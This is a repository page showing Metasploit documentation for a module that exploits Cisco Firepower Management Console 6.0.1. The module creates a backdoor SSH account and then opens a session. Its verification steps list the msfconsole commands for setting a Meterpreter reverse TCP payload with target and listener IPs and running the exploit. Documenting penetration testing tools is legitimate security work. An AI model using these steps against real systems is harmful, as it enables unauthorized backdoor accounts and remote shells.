adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
a59ca569e754b8dae13dea5e9f9da84f9b77a06f
metasploit-gs/documentation/modules/exploit/linux/http/cisco_firepower_useradd.md
T
wchen-r7 a59ca569e7 Add doc
2017-01-09 11:55:01 -06:00

743 B
Raw Blame History

This module exploits a vulnerability in Cisco Firepower Management Console RCE. It will create a backdoor SSH account via HTTPS, and then obtain a native payload session in SSH.

Vulnerable Application

This exploit was specifically written against 6.0.1 (build 1213). To test, you can find the virtual appliance here:

https://software.cisco.com/download/release.html?mdfid=286259687&softwareid=286271056&release=6.0.1&flowid=54052

Verification Steps

  1. Start msfconsole
  2. use exploit/linux/http/cisco_firepower_useradd
  3. set password [https console password for admin]
  4. set rhost [IP]
  5. set payload linux/x86/meterpreter/reverse_tcp
  6. set lhost [IP]
  7. exploit
  8. You should get a session
Reference in New Issue View Git Blame Copy Permalink